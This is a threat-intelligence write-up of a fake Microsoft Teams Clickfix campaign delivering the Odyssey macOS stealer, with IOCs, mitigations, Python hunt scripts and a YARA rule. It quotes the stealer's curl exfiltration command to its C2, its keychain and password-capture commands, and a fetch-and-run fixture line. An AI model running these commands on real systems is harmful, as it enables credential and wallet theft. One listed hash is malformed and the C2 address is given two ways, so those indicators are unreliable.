
Threat Actors Impersonate Microsoft Teams To Deliver Odyssey macOS Stealer Via Clickfix

Threat actors are exploiting a fake Microsoft Teams download site to deliver the Odyssey macOS stealer via Clickfix. Once executed, the malware harvests credentials, cookies, Apple Notes, and crypto wallets, exfiltrating data to a C2 server before ensuring persistence through LaunchDaemons and even replacing Ledger Live with a trojanized version. The campaign poses severe risks of credential theft, financial loss, and long-term reinfection.

Koushik Pal
September 5, 2025
Green Alert
Last update posted on September 5, 2025

Executive Summary

In early August 2025, Forcepoint released a report about a Clickfix campaign that impersonated TradingView to deliver the Odyssey stealer. During routine infrastructure discovery, CloudSEK’s TRIAD identified that the threat actors are now luring users via a fake Microsoft Teams download site. When a victim pastes and runs the copied command in Terminal, a base64-encoded blob decodes to an AppleScript stealer (Odyssey) that is executed through osascript. The malware harvests credentials, browser cookies, Apple Notes, and multiple desktop and extension-based cryptocurrency wallets, stages the data in /tmp/out.zip, and exfiltrates it to its C2. It then establishes persistence via a LaunchDaemon and replaces Ledger Live with a trojanized version.

Analysis 

During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix themed delivery websites targeting macOS users. One of those websites was found to be impersonating Microsoft, with a “Microsoft Teams” logo on the delivery page. Hunting using FOFA, we found 24 unique IPs belonging to the same cluster.

Landing page - teamsonsoft[.]com

When the victim clicks “Copy”, a command is placed on the clipboard; which command depends on the browser’s user agent. For a Windows user agent it is the command displayed on the page. For a macOS user agent it is the one below:

Clipboard - macOS useragent

The base64-encoded text decodes to the script below:

Contents of delivery script

1) Execution

  • One-liner launches a large embedded AppleScript with osascript -e 'run script ...'. No exploit, just script execution. (T1059.002) 

2) Discovery

  • Gathers system inventory with system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType; stores it as “hardware” in a temp working dir /tmp/<random>/. (T1082) 

3) Credential Access, Privilege Escalation

  • Checks whether it already holds a valid password for the local user with dscl . authonly. If not, it shows a fake dialog (“Required Application Helper. Please enter device password to continue.”) and loops until dscl . authonly accepts the input, so the attacker ends up with a verified password rather than a guess. (T1056.002, T1110) 
  • Pulls the Chrome Safe Storage secret from the login keychain via security ... find-generic-password -ga "Chrome" and writes it to a “masterpass-chrome” file; this is the key needed to decrypt the copied Login Data and Cookies databases offline. (T1555.001) 
  • Stashes the captured password at ~/.pwd. (T1555, T1078) 

4) Collection

Apple ecosystem

  • Apple Notes database (NoteStore.sqlite, -wal, -shm) plus a fallback that scripts the Notes app to export note bodies to HTML; also vacuums Notes attachments from the Notes “Media” folders. (T1119, T1005) 
  • Safari artifacts: Cookies.binarycookies, “Form Values”. (T1555.003, T1539) 
  • Login keychain copy: ~/Library/Keychains/<HardwareUUID> and login.keychain-db. (T1555.001) 

Browsers (Chromium family: Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Chromium, etc.)

  • Walks every Default/Profile * profile and copies:
    • Cookies, Web Data, Login Data (saved logins & autofill). (T1555.003)
    • Local Extension Settings/ and IndexedDB/ for a very long allowlist of extension IDs (wallets, password managers, etc.). (T1005) 

Browsers (Gecko family: Firefox, Waterfox)

  • Copies cookies.sqlite, formhistory.sqlite, key4.db, logins.json from each profile. (T1555.003)
  • Specifically hunts MetaMask storage by parsing prefs.js to derive the extension’s storage path, then copies its idb buckets. (T1005) 

Crypto wallets (desktop apps)

  • Recursively copies data for Electrum, Coinomi, Exodus, Atomic, Wasabi, Monero, Bitcoin Core, Litecoin Core, Dash Core, Electron Cash, Guarda, Dogecoin Core, Trezor Suite, plus Ledger Live. (T1555, T1005) 
  • Also grabs Binance/TonKeeper config paths. 

Grab-bag

  • From Desktop/Documents, quietly copies up to ~10 MB of files with “interesting” extensions: txt,pdf,doc,docx,keys,key,wallet,kdbx,jpg,png,jpeg,rtf. (T1005) 

5) Exfil Preparation

  • Mirrors directory trees but skips noisy caches (GPUCache, Code Cache, Crashpad, Cache, etc.). (T1074)
  • Archives everything to /tmp/out.zip via ditto -c -k. (T1560) 

6) Exfiltration, C2

  • curl -X POST ... --data-binary @/tmp/out.zip http://185.93.89[.]62/log with headers buildid, username: vipx, repeat: false. Retries on failure. (T1041) 
  • Same host serves secondary payloads at /otherassets/plist and /otherassets/ledger.zip. (T1105) 

7) Persistence, Defense Evasion, C2

  • LaunchDaemon persistence: downloads a shell command string from the C2, wraps it in a randomly named com.<random>.plist, installs it to /Library/LaunchDaemons/ and loads it with launchctl bootstrap system ...; falls back to running the command under nohup if bootstrap fails. Writing to /Library/LaunchDaemons and bootstrapping into the system domain require root, which is why the password captured earlier is used with sudo. (T1543.004) 
  • App replacement: kills Ledger Live, removes /Applications/Ledger Live.app with sudo, and unzips the ZIP fetched from the C2 (/otherassets/ledger.zip) in its place. (T1036, T1105) 
  • Cleans up the working dir and /tmp/out.zip after upload. (T1070.004) 

This Odyssey sample runs via osascript, steals keychains, cookies, saved logins, Apple Notes, and dozens of wallet/extension stores, zips everything, ships it to http://185.93.89[.]62/log, then plants persistence (LaunchDaemon) and even replaces Ledger Live with a trojanized copy. The C2 is also hosting the Odyssey stealer login panel.
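The clipboard-to-script step shown above and the behaviour list in 1) to 7), as an added example that is not CloudSEK tooling or the actor’s script: a small Python triage helper that pulls the base64 blob out of a Clickfix clipboard one-liner, decodes it, and reports which of the listed behaviours and which C2 URLs appear in the decoded stage. The one-liner shape (echo <b64> | base64 -d | sh), the stand-in stage text and the RFC 5737 address 203.0.113.10 are constructed for this example; the real delivery command is not reproduced.

```python
"""Decode a ClickFix clipboard one-liner and score the decoded stage for the
Odyssey behaviours described in steps 1) to 7). Added example, not CloudSEK's
tooling; the sample inputs below are constructed, not the real script."""
import base64
import re
import string
from typing import Optional

# Behaviours the analysis attributes to the sample, keyed by the ATT&CK
# technique the write-up maps them to. Regexes tolerate AppleScript-escaped quotes.
INDICATORS = {
    "T1059.002 osascript run script": re.compile(r"osascript\s+-e\s+'run script"),
    "T1056.002 fake prompt validated with dscl": re.compile(r"dscl\s+\.\s+authonly"),
    "T1555.001 Chrome Safe Storage via security": re.compile(r'find-generic-password\s+-ga\s+\\?"Chrome'),
    "T1555.001 login keychain copy": re.compile(r"login\.keychain-db"),
    "T1119 Apple Notes database": re.compile(r"NoteStore\.sqlite"),
    "T1539 Safari cookies": re.compile(r"Cookies\.binarycookies"),
    "T1560 staging archive via ditto": re.compile(r"ditto\s+-c\s+-k"),
    "T1041 curl POST of /tmp/out.zip": re.compile(r"curl\b.*--data-binary\s+@/tmp/out\.zip"),
    "T1543.004 LaunchDaemon install": re.compile(r"/Library/LaunchDaemons/"),
    "T1036 Ledger Live replacement": re.compile(r"Ledger Live\.app"),
}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def extract_payload(oneliner: str) -> Optional[str]:
    """Decode the longest base64 blob in the one-liner, or None when nothing
    decodes to mostly printable text (i.e. no embedded script stage)."""
    for blob in sorted(B64_RE.findall(oneliner), key=len, reverse=True):
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        text = raw.decode("utf-8", errors="replace")
        printable = sum(ch in string.printable for ch in text) / max(len(text), 1)
        if printable > 0.95:
            return text
    return None


def defang(url: str) -> str:
    """hxxp://1[.]2[.]3[.]4/path form so the report cannot be clicked."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def score(stage: str) -> dict:
    """Which listed behaviours appear in the decoded stage, plus defanged C2 URLs."""
    return {
        "techniques": [name for name, rx in INDICATORS.items() if rx.search(stage)],
        "c2": sorted({defang(u) for u in URL_RE.findall(stage)}),
    }


def triage(oneliner: str) -> dict:
    """End-to-end: clipboard text in, decode flag + technique hits + C2 list out."""
    stage = extract_payload(oneliner)
    if stage is None:
        return {"decoded": False, "techniques": [], "c2": []}
    return {"decoded": True, **score(stage)}


# Constructed stand-in for the decoded stage: a handful of lines shaped like the
# commands quoted in the analysis, with a documentation-range (RFC 5737) C2.
SAMPLE_STAGE = """\
osascript -e 'run script "..."'
do shell script "dscl . authonly " & user & " " & pw
do shell script "security find-generic-password -ga \\"Chrome\\" > masterpass-chrome"
do shell script "ditto -c -k /tmp/abc123 /tmp/out.zip"
do shell script "curl -X POST -H 'username: vipx' --data-binary @/tmp/out.zip http://203.0.113.10/log"
do shell script "sudo launchctl bootstrap system /Library/LaunchDaemons/com.48213.plist"
"""
# The clipboard wrapper is assumed to be 'echo <b64> | base64 -d | sh'; the real
# page's exact wrapper is not reproduced here.
SAMPLE_CLIPBOARD = "echo " + base64.b64encode(SAMPLE_STAGE.encode()).decode() + " | base64 -d | sh"

if __name__ == "__main__":
    report = triage(SAMPLE_CLIPBOARD)
    print("decoded:", report["decoded"])
    for name in report["techniques"]:
        print("  hit:", name)
    print("c2:", ", ".join(report["c2"]))
```

Run it against whatever the landing page puts on the clipboard (paste the text as the argument to triage); a decoded stage that hits the dscl, ditto and curl patterns together is the Odyssey pattern described above, and the defanged URL list gives you the C2 to block without reproducing a live link in a ticket.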

Indicators of Compromise

IOC Indicator Table

Type                Indicator
IP / C2             185.93.89[.]62 (HTTP; paths /log, /otherassets/plist, /otherassets/ledger.zip). Note: this report also gives the address as 185.93.89[.]162; the curl command in the sample posts to .62, so verify the last octet before acting on either value.
Delivery            teamsonsoft[.]com (Clickfix landing page)
Hashes (SHA-256)    9c520fa25239c0f116ce7818949ddce5fd2f315317863715416cb4886c5aeb2
                    7a8250904e6f079e1a952b87e55dc87e467cc560a2694a142f2d6547ac40d5e1
                    d81cc9380673cb36a30f2a84ef155b0cbc7958daa6870096e455044fba5f9ee8
                    397ee604eb5e20905605c9418838aadccbbbfe6a15fc9146442333cfc1516273
                    909038524250903a44efd734710e60a8f73719130176c726e58d3287b22067c8
File Artifacts      ~/.pwd, ~/.username, ~/.chost, ~/.botid
Persistence         /Library/LaunchDaemons/com.<random>.plist (random numeric suffix)
Process/Commands    osascript -e 'run script ...', dscl . authonly, security find-generic-password -ga "Chrome", ditto -c -k, curl -X POST ... --data-binary @/tmp/out.zip, unzip /tmp/ledger.zip
App Tampering       Replacement of /Applications/Ledger Live.app with a trojanized version

Impact

  • Credential Theft: Browser logins, autofill data, keychains, and crypto wallet credentials stolen.
  • Data Exfiltration: Notes, documents, images, and up to ~10 MB of personal files from Desktop/Documents exfiltrated.
  • Financial Theft: Direct compromise of crypto wallets (desktop + extension + Ledger Live tampering).
  • Persistence & Re-infection: System-level LaunchDaemon ensures long-term access and reinfection risk.

Mitigations

  • Network Controls: Block the listed C2 and alert on outbound HTTP POSTs from curl whose body is a zip archive (PK magic or application/zip) to a bare IP address; the /log, /otherassets/plist and /otherassets/ledger.zip paths work as URL signatures.
  • Endpoint Hunting: Audit /Library/LaunchDaemons/ for com.<digits>.plist and for any daemon not installed by a known package; review recent osascript executions (for example log show --predicate 'process == "osascript"' --last 1d) and check for ~/.pwd, ~/.username, ~/.chost, ~/.botid and /tmp/out.zip.
  • Credential Hygiene: The captured password is the user’s login password and the login keychain was copied, so reset that account password and every credential stored in the keychain, browser-saved logins, Apple ID, and wallet passphrases; move crypto funds to wallets generated on a clean system rather than reusing the exposed seeds.
  • Containment & Recovery: Remove the LaunchDaemon and the trojanized /Applications/Ledger Live.app (verify any reinstalled copy with codesign --verify --deep --strict), wipe temp artifacts, and rebuild infected macOS systems if integrity cannot be guaranteed; because the daemon ran as root, rebuilding is the safe default.
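The endpoint-hunting and containment checks above, as an added example that is not CloudSEK tooling: a Python hunt that flags com.<digits>.plist LaunchDaemons and shows the program they would run, checks for the stealer’s home-directory and /tmp artifacts, and verifies Ledger Live’s code signature with codesign where that binary exists. Paths are parameters so it can be pointed at a mounted image as well as a live host; the make_demo_host() fixture builds a constructed directory tree (one numeric-label daemon, one Apple-style daemon, a ~/.pwd and an empty /tmp/out.zip) purely to demonstrate the checks.

```python
"""Hunt a macOS host (or mounted image) for the Odyssey artefacts in the IOC
table. Added example, not CloudSEK tooling; make_demo_host() is constructed
test data, not real evidence."""
import plistlib
import re
import shutil
import subprocess
import tempfile
from pathlib import Path

# The LaunchDaemon the post describes: com.<random numeric suffix>.plist
DAEMON_NAME_RE = re.compile(r"^com\.\d+\.plist$")
# Dotfiles the stealer leaves in the victim's home directory (IOC table above)
HOME_ARTIFACTS = (".pwd", ".username", ".chost", ".botid")
# Staging archive and secondary payload under /tmp
TMP_ARTIFACTS = ("out.zip", "ledger.zip")


def suspicious_launchdaemons(daemon_dir: Path) -> list:
    """Daemons whose filename matches com.<digits>.plist, with the program they
    run. Apple's own daemons use reverse-DNS labels (com.apple.<service>), so an
    all-numeric label is worth a look; an unparsable plist still counts as a hit."""
    findings = []
    if not daemon_dir.is_dir():
        return findings
    for plist in sorted(daemon_dir.glob("*.plist")):
        if not DAEMON_NAME_RE.match(plist.name):
            continue
        try:
            with plist.open("rb") as fh:
                data = plistlib.load(fh)
        except Exception:
            data = {}
        findings.append({
            "path": str(plist),
            "label": data.get("Label"),
            "program": data.get("ProgramArguments") or data.get("Program"),
        })
    return findings


def present(base: Path, names) -> list:
    """Paths under base that exist, e.g. ~/.pwd or /tmp/out.zip."""
    return [str(base / n) for n in names if (base / n).exists()]


def ledger_live_signature(app: Path):
    """True if codesign validates the bundle, False if it fails, None when the app
    is absent or codesign is unavailable (non-macOS). A Ledger Live.app unzipped
    from the C2 will not carry Ledger's signature."""
    if not app.exists() or shutil.which("codesign") is None:
        return None
    rc = subprocess.run(["codesign", "--verify", "--deep", "--strict", str(app)],
                        capture_output=True).returncode
    return rc == 0


def hunt(home: Path, daemon_dir: Path, tmp_dir: Path, apps_dir: Path) -> dict:
    """Run every check and return one report dict."""
    return {
        "launchdaemons": suspicious_launchdaemons(daemon_dir),
        "home_artifacts": present(home, HOME_ARTIFACTS),
        "tmp_artifacts": present(tmp_dir, TMP_ARTIFACTS),
        "ledger_live_signed": ledger_live_signature(apps_dir / "Ledger Live.app"),
    }


def make_demo_host() -> dict:
    """Constructed fixture (not real evidence): a fake filesystem layout with one
    Odyssey-style daemon beside a benign Apple-style one, a ~/.pwd and /tmp/out.zip."""
    root = Path(tempfile.mkdtemp(prefix="odyssey-hunt-"))
    daemons, home, tmp, apps = (root / d for d in ("LaunchDaemons", "home", "tmp", "Applications"))
    for d in (daemons, home, tmp, apps):
        d.mkdir()
    with (daemons / "com.48213.plist").open("wb") as fh:
        plistlib.dump({"Label": "com.48213", "RunAtLoad": True,
                       "ProgramArguments": ["/bin/sh", "-c", "curl -s hxxp://C2/otherassets/plist | sh"]}, fh)
    with (daemons / "com.apple.example.plist").open("wb") as fh:
        plistlib.dump({"Label": "com.apple.example", "Program": "/usr/libexec/example"}, fh)
    (home / ".pwd").write_text("hunter2\n")
    (tmp / "out.zip").write_bytes(b"PK\x05\x06" + b"\0" * 18)  # empty zip archive
    return {"home": home, "daemons": daemons, "tmp": tmp, "apps": apps}


if __name__ == "__main__":
    # Live run on a macOS host; run as root so every daemon plist is readable.
    report = hunt(Path.home(), Path("/Library/LaunchDaemons"), Path("/tmp"), Path("/Applications"))
    for key, value in report.items():
        print(f"{key}: {value}")
```

A hit on the numeric-label daemon plus any of the dotfiles is enough to treat the host as fully compromised: the daemon was bootstrapped into the system domain with the victim’s password, so a clean rebuild rather than selective deletion is the right recovery path, and the codesign result only tells you whether the Ledger Live bundle on disk is Ledger’s, not whether the user has already signed a transaction through the trojanized one.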

Yara Rule

// Matches the decoded AppleScript/shell stage, not the base64 blob on the clipboard;
// decode the one-liner first or scan osascript's argument/temp files.
rule OSX_Odyssey_Osascript_Exec
{
    meta:
        description = "Detects Odyssey stealer AppleScript execution via osascript"
        date = "2025-09-04"

    strings:
        // one-liner that launches the embedded AppleScript (T1059.002)
        $osascript = "osascript -e 'run script" ascii
        // fake password prompt loop validates the entered password with dscl (T1056.002)
        $dscl_auth = "dscl . authonly" ascii
        // pulls the Chrome Safe Storage secret from the login keychain (T1555.001);
        // the full command is used rather than the bare word "security" to avoid
        // matching ordinary text
        $security_chrome = "find-generic-password -ga \"Chrome\"" ascii
        // file the stealer writes that secret to
        $masterpass = "masterpass-chrome" ascii

    condition:
        all of them
}
